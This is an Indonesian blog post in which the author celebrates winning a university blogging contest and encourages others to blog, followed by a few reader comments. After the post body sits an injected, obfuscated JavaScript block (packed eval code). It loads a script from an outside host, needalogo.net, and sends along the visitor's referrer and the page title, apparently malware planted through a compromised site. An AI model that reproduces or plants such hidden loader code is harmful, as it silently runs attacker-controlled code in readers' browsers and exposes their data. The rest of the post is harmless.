browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

ngeBlog yukkkk ……

Posted by on December 31, 2013

blog

Horeeeeee ………..  blog ini disebut jadi jawara di sini lho… Makasih Allah, makasih reviewer/juri/tim penilai, makasih buat pembaca yang sering mampir kesini jadi secara ga langsung bikin blog ini makin populer ….

Jujur nih, ga pernah menyangka lho bisa juara 1, karena blog yang lain kan bagus bagus, lha saya??? masih jauuhhhhhh dari sempurna, wong ganti head aja gagal melulu. Intinya saya masih belum canggih ngutak atik head lah …. dan masih banyak ilmu blogging lainnya yang belum saya kuasai.

Tapiiiiiiiiiiiiii……. ternyata ngeblog itu bukan berarti harus pinter ngutak atik head lho, (tapi kalau memang bisa, akan menjadi nilai tambah tersendiri) syukur syukur sekalian jago php, css ama dreamweaver juga jadi paham html dan bisa bikin web sendiri deh, hehehe …..

Berawal dari suka blogwalking kemana mana akhirnya saya jadi punya blog disini dan blog ini sendiri. Ada juga blog saya yang isinya jualan ama satu lagi blog yang isinya pure curahan hati, jadi urlnya saya hide aja ya, hihihi….
Secara ga sadar, blog saya koq jadi banyak yaa.. Lha memang ngeblog itu mengasyikkan koq. Dengan ngeblog kita jadi bisa mengekspresikan segala pemikiran, ide, emosi (lah daripada nangis ga jelas atau marah tanpa batas lak mendingan dituangkan ke blog aja toh, jadi emosinya tetep elegan, ini makanya saya punya blog curahan hati pribadi) trus kita juga bisa bertukar informasi (saya jadi tau trik nya nawar di pasar dengan murah tanpa diomeli penjual dari sesama blogger lho, saya juga jadi tau kalo labu itu bermanfaat banget gara gara pernah bahas tentang labu disini beberapa hari lalu, kalo gak karena nge blog mungkin saya malah ga kepikiran ngurusi labu,hihihi..)  Keuntungan ngeblog lainnya adalah bisa dapet teman baru/sodara baru (believe me, it’s really great to have a new friend who ever she/he is).  Kalau ternyata si temen blogger ini dari daerah lain (misalnya dari eropa, afrika, dll) kita bisa belajar banyak hal dari daerah dia kan, kalau ternyata si temen blogger ini sedaerah malah bisa ketemuan, trus ngopi ngopi sambil ngrumpi bareng deh… :D

Nah, ga cuma itu aja, nge blog juga bisa datengin duit lhoo (saya aja jualan kue online by blogging), trus kalo ngeblognya udah profesional, bisa narik duit dari pemasukan iklan juga lhooo. Ditambah lagi saat ini kan banyak tuh kontes blog, jadi peluang dapet hadiah (baik berupa uang atau barang) makin terbuka lebar. (seperti saya yang alhamdulilah menang disini, makasih ya UB……)

Oya ngeblog juga bisa jadi ladang berburu pahala lho, kalau misalnya ada seseorang yang lagi nyari info terus nemunya di blog kita, kan blog kita jadi bermanfaat tuh, brati bisa berburu pahala juga kan …. ditambah lagi blogging juga memotivasi kita untuk selalu memberikan yang terbaik kepada pembaca. By blogging juga secara ga langsung jadi berusaha belajar banyak hal kan… Jadi makin pinter deh

Makanya…..  tunggu apa lagi, nge blog yuukkkk ….. Kampus kita UB tercinta suppport banget lhoo aktivitas blogging ini, semua fasilitas nge-blog sudah tersedia, bahkan ada UB Blogmetric segala, semoga tahun tahun mendatang hadiahnya writing short course ke Eropa, aamiinn ….. :)
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

6 Responses to ngeBlog yukkkk ……

  1. Alfanur Rizal

    hehehe..,
    diotak atik dewe loh bisa mbak wkwkwk :D

  2. Alfanur Rizal

    kalo sekarang udah jadi jawara.,
    berarti saatnya nambah skill mbak.,
    buat tampilan blog mbak nampak lebih menarik dan lebih rapi.,
    pilih theme dan widget yang pas dan cukupan., biar lebih matang nih blognya.. :)

    *saran* ^_^

  3. Alfanur Rizal

    ahehehee…,
    senang bisa menginspirasi..

    terus nge-blog.,
    terus nulis.,
    tak perlu dipaksa., pengen nulis ya nulis., gak pengen nulis ya diem.. :D

    sukses juga buat mbak…
    (meskipun gatau sukses dimananya)

  4. Alfanur Rizal

    siipp.., selamat ya mbak..,
    the next champion ^_^

    salam hangat dari http://tanyakenapa.net

Leave a Reply